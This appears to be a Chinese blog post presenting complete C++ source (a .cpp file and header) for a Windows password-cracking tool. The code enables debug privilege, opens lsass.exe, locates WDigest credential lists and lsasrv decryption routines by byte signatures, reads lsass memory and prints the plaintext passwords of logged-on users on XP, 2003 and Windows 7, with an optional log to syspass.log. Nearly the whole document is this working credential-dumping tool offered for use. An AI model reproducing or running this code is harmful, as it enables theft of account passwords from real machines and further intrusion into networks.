用c++编写破解Windows密码程序(缺点只能破解当前电脑的密码)
.cpp文件
#include "CrackWinPassword.h"
#pragma warning(disable:4996)
#pragma warning(disable:4703)
HANDLE GetProcessHandleByName(const CHAR* szName)
{
//
// GetProcessHandle获得lsass.exe进程句柄
//
DWORD ReturnLength, nBytes;
WCHAR Buffer[MAX_PATH + 0x20];
//PWCHAR pRetStr;
pNTQUERYPROCESSINFORMATION NtQueryInformationProcess;
CHAR szCurrentPath[MAX_PATH];
//获取函数地址
NtQueryInformationProcess = (pNTQUERYPROCESSINFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess");
// Process ID 一定是 4 的倍数
DWORD dwProcessId;//进程ID
HANDLE hProcess;//进程句柄
for (dwProcessId = 4; dwProcessId < 10 * 1000; dwProcessId += 4)
{
//打开一个进程
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
if (hProcess != NULL)
{
//将指定类型的进程信息拷贝到某个缓冲
if (!NtQueryInformationProcess(hProcess, 27, Buffer, sizeof(Buffer), &ReturnLength))
{
//pRetStr = (PWCHAR)(*(DWORD *)((DWORD)Buffer + 4));
/* "bd6\\Device\\HarddiskVolume1\\Windows\\System32\\smss.exe" "\\Device\\HarddiskVolume1\\Windows\\System32\\smss.exe" */
//去除前面4个字符
PWCHAR pszPath = (PWCHAR)((char*)Buffer + 8);
//将宽字符转换为多字节
nBytes = WideCharToMultiByte(CP_ACP, 0, pszPath, -1, szCurrentPath, MAX_PATH, NULL, NULL);
if (nBytes)
{
PCHAR pCurName = &szCurrentPath[nBytes - 1];
while (pCurName >= szCurrentPath)
{
if (*pCurName == '\\')
break;
pCurName--;
}
pCurName++;
if (lstrcmpi(szName, pCurName) == 0)
{
return hProcess;
}
}
}
// 关闭打开的句柄
CloseHandle(hProcess);
}
}
return NULL;
}
//
//根据密文关键指针特征码 KeyPointerSign[]获得密文存储的关键相关地址
//
LPVOID GetEncryptListHead()
{
//LPVOID pEndAddr, KeyPointer, pTemp;
//加载wdigest.dll模块,获取模块地址也就是模块基地址
HINSTANCE hModWdigest = LoadLibrary("wdigest.dll");
//获取函数SpInstanceInit地址 也就是结束地址
LPVOID pEndAddr = GetProcAddress(hModWdigest, "SpInstanceInit");
//当前指针 将模块基地址赋值给他
LPVOID pTemp = hModWdigest;
LPVOID KeyPointer = NULL;
while (pTemp < pEndAddr && pTemp != NULL)
{
KeyPointer = pTemp;
pTemp = (LPVOID)SearchBytes(
(PBYTE)pTemp + sizeof(KeyPointerSign), //起始地址
(PBYTE)pEndAddr, //结束地址
KeyPointerSign, //查找数据
sizeof(KeyPointerSign)); //查找大小
}
KeyPointer = (LPVOID)(*(DWORD*)((DWORD)KeyPointer - 4));
//释放模块
FreeLibrary(hModWdigest);
return KeyPointer;
}
void k8writeTxt(char* logtext)
{
//写入txt
FILE* pFile = NULL;
pFile = fopen("syspass.log", "a+");
// 12345/n5678/n 用sizeof 结果竟然只得到 1234
//fwrite( ptext2, sizeof(ptext2), 1, pFile );
fwrite(logtext, strlen(logtext), 1, pFile);
fclose(pFile); //关闭时会写入结束符
}
int main()
{
//DWORD LogonSessionCount, i, dwBytesRead;
//PLUID LogonSessionList, pCurLUID, pListLUID;
BYTE EncryptBuf[0x200];
//调节进程权限
if (FALSE == EnableDebugPrivilege())
{
printf("调整进程权限失败.错误代码:%d\n", GetLastError());
return 0;
}
//根据进程名字,获取进程句柄
HANDLE hLsassProcess = GetProcessHandleByName("lsass.exe");
if (hLsassProcess == NULL)
{
printf("通过进程名获取进程句柄失败.错误代码:%d\n", GetLastError());
printf("尝试以管理员身份运行.\n");
return 0;
}
OSVERSIONINFO VersionInformation;
DWORD dwVerOff = 0, osKind = -1;
//操作系统版本判断
memset(&VersionInformation, 0, sizeof(VersionInformation));
VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation);
if (FALSE == GetVersionEx(&VersionInformation))
{
printf("获取操作系统版本失败.错误代码:%d\n", GetLastError());
return 0;
}
if (VersionInformation.dwMajorVersion == 5)
{
if (VersionInformation.dwMinorVersion == 1)
{
dwVerOff = 36;
osKind = WINXP;
}
else if (VersionInformation.dwMinorVersion == 2)
{
dwVerOff = 28;
osKind = WIN03;
}
}
else if (VersionInformation.dwMajorVersion == 6)
{
dwVerOff = 32;
osKind = WIN7;
}
if (osKind == -1)
{
printf("[未知操作系统版本] 主版本号: %d 次版本号: %d\n", VersionInformation.dwMajorVersion, VersionInformation.dwMinorVersion);
CloseHandle(hLsassProcess);
return 0;
}
//获得解密函数地址
HINSTANCE hModLsasrv = LoadLibrary("lsasrv.dll");
if (hModLsasrv == NULL)
{
printf("加载lsasrv.dll模块失败.错误代码:%d", GetLastError());
return 0;
}
pDECRIPTFUNC DecryptFunc;
//搜索指定地址处的解密函数特征值字节序列
DecryptFunc = (pDECRIPTFUNC)SearchBytes((PBYTE)hModLsasrv, //lsasrv模块句柄,模块基地址
(PBYTE)0x7fffdddd, //结束地址
DecryptfuncSign, //解密函数特征码
sizeof(DecryptfuncSign));//字节个数
// 获得密文链表头地址
LPVOID ListHead;
ListHead = GetEncryptListHead();
// 获得全局数据(lsasrv.data及解密KEY相关的数据)
CopyKeyGlobalData(hLsassProcess, hModLsasrv, osKind);
//加载这个模块Secur32.dll
HINSTANCE hModSecur32 = LoadLibrary("Secur32.dll");
//加载LsaEnumerateLogonSessions函数地址 :检索现有的登录会话标识符集合(LUIDs)和会话数量。
pLSAENUMERATELOGONSESSIONS LsaEnumerateLogonSessions = (pLSAENUMERATELOGONSESSIONS)GetProcAddress(hModSecur32, "LsaEnumerateLogonSessions");
//加载LsaGetLogonSessionData函数 检索指定的登录会话信息。若要检索关于登录会话的信息,调用方必须是会话的所有者或本地系统管理员。
pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData = (pLSAGETLOGONSESSIONDATA)GetProcAddress(hModSecur32, "LsaGetLogonSessionData");
//加载LsaFreeReturnBuffer函数 释放缓冲的LSA先前分配的内存使用。
pLSAFREERETURNBUFFER LsaFreeReturnBuffer = (pLSAFREERETURNBUFFER)GetProcAddress(hModSecur32, "LsaFreeReturnBuffer");
//检索现有的登录会话标识符集合(LUIDs)和会话数量
DWORD LogonSessionCount;//会话数量
PLUID LogonSessionList;//登录会话标识符集合
LsaEnumerateLogonSessions(&LogonSessionCount, &LogonSessionList);
for (DWORD i = 0; i < LogonSessionCount; i++)
{
DWORD dwBytesRead; //读取字节总数
//当前特权值
PLUID pCurLUID = (PLUID)((DWORD)LogonSessionList + sizeof(LUID) * i);
PLUID pListLUID;
// 打印相关信息
printSessionInfo(LsaGetLogonSessionData, LsaFreeReturnBuffer, pCurLUID);
// 遍历链式结构查找当前的LUID
ReadProcessMemory(hLsassProcess, ListHead, EncryptBuf, 0x100, &dwBytesRead);
while (*(DWORD*)EncryptBuf != (DWORD)ListHead)
{
ReadProcessMemory(hLsassProcess, (LPVOID)(*(DWORD*)EncryptBuf), EncryptBuf, 0x100, &dwBytesRead);
pListLUID = (LUID*)((DWORD)EncryptBuf + 0x10);
if ((pListLUID->LowPart == pCurLUID->LowPart) && (pListLUID->HighPart == pCurLUID->HighPart))
{
break;
}
}
if (*(DWORD*)EncryptBuf == (DWORD)ListHead)
{
puts("Specific LUID NOT found\n");
continue;
}
DWORD pFinal = 0;
DWORD nBytes = 0;
LPVOID pEncrypt;
pFinal = (DWORD)(pListLUID)+dwVerOff;
nBytes = *(WORD*)((DWORD)pFinal + 2); // 密文大小
pEncrypt = (LPVOID)(*(DWORD*)((DWORD)pFinal + 4)); // 密文地址(Remote)
memset(Encryptdata, 0, sizeof(Encryptdata));
ReadProcessMemory(hLsassProcess, (LPVOID)pEncrypt, Encryptdata, nBytes, &dwBytesRead);
// 调用解密函数解密
DecryptFunc(Encryptdata, nBytes);
// 打印密码明文
printf("密码: %S\n\n", Encryptdata);
//k8writeTxt((char*)Encryptdata);//保存日志
}
CloseHandle(hLsassProcess);
LsaFreeReturnBuffer(LogonSessionList);
FreeLibrary(hModLsasrv);
FreeLibrary(hModSecur32);
if (osKind == WIN7)
{
FreeLibrary(GetModuleHandle("bcrypt.dll"));
FreeLibrary(GetModuleHandle("bcryptprimitives.dll"));
}
system("echo 请按任意键退出... & pause > nul");
return 0;
}
void printSessionInfo(pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData, pLSAFREERETURNBUFFER LsaFreeReturnBuffer, PLUID pCurLUID)
{
PSECURITY_LOGON_SESSION_DATA pLogonSessionData;
LsaGetLogonSessionData(pCurLUID, &pLogonSessionData);
printf("UserName: %S\n", pLogonSessionData->UserName.Buffer);
printf("LogonDomain: %S\n", pLogonSessionData->LogonDomain.Buffer);
LsaFreeReturnBuffer(pLogonSessionData);
}
//提升进程权限
BOOL EnableDebugPrivilege()
{
//打开与进程相关联的访问令牌
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
{
return FALSE;
}
//查看系统权限的特权值,返回信息到一个LUID结构体里
LUID sedebugnameValue;
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
{
return 0;
}
//调整访问令牌的特权
TOKEN_PRIVILEGES tkp;
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL))
{
return FALSE;
}
return TRUE;
}
//
// 在pBegin与pEnd之间搜索pBytes地址处的指定字节序列,字节个数为nsize
//
PBYTE SearchBytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize)
{
DWORD count;
PBYTE pDst;
while ((DWORD)pBegin + (DWORD)nsize <= (DWORD)pEnd)
{
pDst = pBytes;
count = 0;
while (count < nsize && *pBegin == *pDst)
{
pBegin++;
pDst++;
count++;
}
if (count == nsize) break;
pBegin = pBegin - count + 1;
}
if (count == nsize)
{
return (PBYTE)((DWORD)pBegin - (DWORD)count);
}
else
{
return NULL;
}
}
//获得全局数据(lsasrv.data及解密KEY相关的数据)
void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind)
{
//节表(区块表) PE文件中所有节的属性都被定义在节表中,节表由一系列的IMAGE_SECTION_HEADER结构排列而成,每个结构用来描述一个节
PIMAGE_SECTION_HEADER pSectionHead;
//DOS头部是由IMAGE_DOS_HEADER结构体来定义的
PIMAGE_DOS_HEADER pDosHead;
//PE头部是真正用来装载Win32程序的头部,该结构体包含PE标识符、文件头与可选头这三部分。该头部具有32位和64位之分
PIMAGE_NT_HEADERS pPEHead;
DWORD dwBytes, dwBytesRead;
LPVOID pdataAddr, pDecryptKey, DecryptKey, pEndAddr;
pDosHead = (PIMAGE_DOS_HEADER)hModlsasrv;
//获取节表地址
pSectionHead = (PIMAGE_SECTION_HEADER)(pDosHead->e_lfanew + (DWORD)hModlsasrv
+ sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER));
//节表数据地址 模块基地址+相对虚拟地址
pdataAddr = (LPVOID)((DWORD)pSectionHead->VirtualAddress + (DWORD)hModlsasrv);
//数据大小
dwBytes = ((DWORD)(pSectionHead->Misc.VirtualSize) / 0x1000 + 1) * 0x1000;
//根据进程句柄读入该进程的某个内存空间
ReadProcessMemory(
hProcess, //正在读取的内存的进程的句柄
pdataAddr, //指向指定进程中要读取的基址的指针
pdataAddr, //指向缓冲区的指针,该缓冲区从指定进程的地址空间接收内容
dwBytes, //要从指定进程读取的字节数。
&dwBytesRead); //实际读取的字节数大小。指向一个变量的指针,该变量接收传输到指定缓冲区中的字节数。
//PE头指针
pPEHead = (PIMAGE_NT_HEADERS)(pDosHead->e_lfanew + (DWORD)hModlsasrv);
//
pEndAddr = (LPVOID)(pPEHead->OptionalHeader.SizeOfImage + (DWORD)hModlsasrv);
switch (osKind)
{
case WINXP:
case WIN03:
{
pDecryptKey = (LPVOID)SearchBytes(
(PBYTE)(hModlsasrv),
(PBYTE)pEndAddr,
DecryptKeySign_XP,
sizeof(DecryptKeySign_XP));
pDecryptKey = (LPVOID) * (DWORD*)((DWORD)pDecryptKey + sizeof(DecryptKeySign_XP));
ReadProcessMemory(
hProcess,
(LPVOID)pDecryptKey,
&DecryptKey,
4,
&dwBytesRead);
// DecryptKey 是与解密相关的关键地址
ReadProcessMemory(
hProcess,
(LPVOID)DecryptKey,
MemBuf,
0x200,
&dwBytesRead);
pdataAddr = (LPVOID)pDecryptKey;
*(DWORD*)pdataAddr = (DWORD)MemBuf;
break;
}
case WIN7:
{
// WIN7 需调用这两个DLL中的函数进行解密
LoadLibrary("bcrypt.dll");//加密解密库
LoadLibrary("bcryptprimitives.dll");
pDecryptKey = (LPVOID)SearchBytes(
(PBYTE)(hModlsasrv),
(PBYTE)pEndAddr,
DecryptKeySign_WIN7,
sizeof(DecryptKeySign_WIN7));
pDecryptKey = (LPVOID)(*(DWORD*)((DWORD)pDecryptKey - 4));
// DecryptKey 是与解密相关的关键地址
ReadProcessMemory(hProcess, pDecryptKey, &DecryptKey, 0x4, &dwBytesRead);
ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead);
pdataAddr = (LPVOID)pDecryptKey;
*(DWORD*)pdataAddr = (DWORD)MemBuf;
ReadProcessMemory(hProcess, (LPVOID)(*(DWORD*)((DWORD)MemBuf + 8)), SecBuf, 0x200, &dwBytesRead);
pdataAddr = (LPVOID)((DWORD)MemBuf + 8);
*(DWORD*)pdataAddr = (DWORD)SecBuf;
ReadProcessMemory(hProcess, (LPVOID)(*(DWORD*)((DWORD)MemBuf + 0xC)), ThirdBuf, 0x200, &dwBytesRead);
pdataAddr = (LPVOID)((DWORD)MemBuf + 0xC);
*(DWORD*)pdataAddr = (DWORD)ThirdBuf;
break;
}
}
return;
}
.h头文件
#include <windows.h>
#include <stdio.h>
#define MEM_SIZE 0x1000
#define WIN7 0x1
#define WINXP 0x2
#define WIN03 0x4
typedef struct _LSA_UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
}LSA_UNICODE_STRING, * PLSA_UNICODE_STRING;
typedef struct _SECURITY_LOGON_SESSION_DATA
{
ULONG Size;
LUID LogonId;
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING LogonDomain;
LSA_UNICODE_STRING AuthenticationPackage;
ULONG LogonType; ULONG Session;
PSID Sid;
LARGE_INTEGER LogonTime;
LSA_UNICODE_STRING LogonServer;
LSA_UNICODE_STRING DnsDomainName;
LSA_UNICODE_STRING Upn;
}SECURITY_LOGON_SESSION_DATA, * PSECURITY_LOGON_SESSION_DATA;
typedef int(__stdcall* pNTQUERYPROCESSINFORMATION)(HANDLE, DWORD, PVOID, ULONG, PULONG);
typedef int(__stdcall* pLSAENUMERATELOGONSESSIONS)(PULONG, PLUID*);
typedef int(__stdcall* pDECRIPTFUNC)(PBYTE, DWORD);
typedef int(__stdcall* pLSAFREERETURNBUFFER)(PVOID);
typedef int(__stdcall* pLSAGETLOGONSESSIONDATA)(PLUID, PSECURITY_LOGON_SESSION_DATA*);
BOOL EnableDebugPrivilege();
void printHexBytes(PBYTE data, int nBytes);
PBYTE SearchBytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize);
void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind);
HANDLE GetProcessHandleByName(const CHAR* szName);
LPVOID GetEncryptListHead();
void printSessionInfo(pLSAGETLOGONSESSIONDATA, pLSAFREERETURNBUFFER, PLUID);
// 解密函数特征码(lsasrv.text)
BYTE DecryptfuncSign[] =
{
0x8B, 0xFF, 0x55, 0x8B,
0xEC, 0x6A, 0x00, 0xFF,
0x75, 0x0C, 0xFF, 0x75,
0x08, 0xE8
};
// 密钥KEY相关的关键地址特征码(lsasrv.text)
BYTE DecryptKeySign_WIN7[] =
{
0x33, 0xD2, 0xC7, 0x45,
0xE8, 0x08, 0x00, 0x00,
0x00, 0x89, 0x55, 0xE4
};
BYTE DecryptKeySign_XP[] =
{
0x8D, 0x85, 0xF0, 0xFE,
0xFF, 0xFF, 0x50, 0xFF,
0x75, 0x10, 0xFF, 0x35
};
// 密文关键指针特征码(wdigest.text)
BYTE KeyPointerSign[] =
{
0x8B, 0x45, 0x08, 0x89,
0x08, 0xC7, 0x40, 0x04
};
// 全局变量
BYTE MemBuf[MEM_SIZE], SecBuf[0x200], ThirdBuf[0x200];
BYTE Encryptdata[0x100];
京公网安备 11010502036488号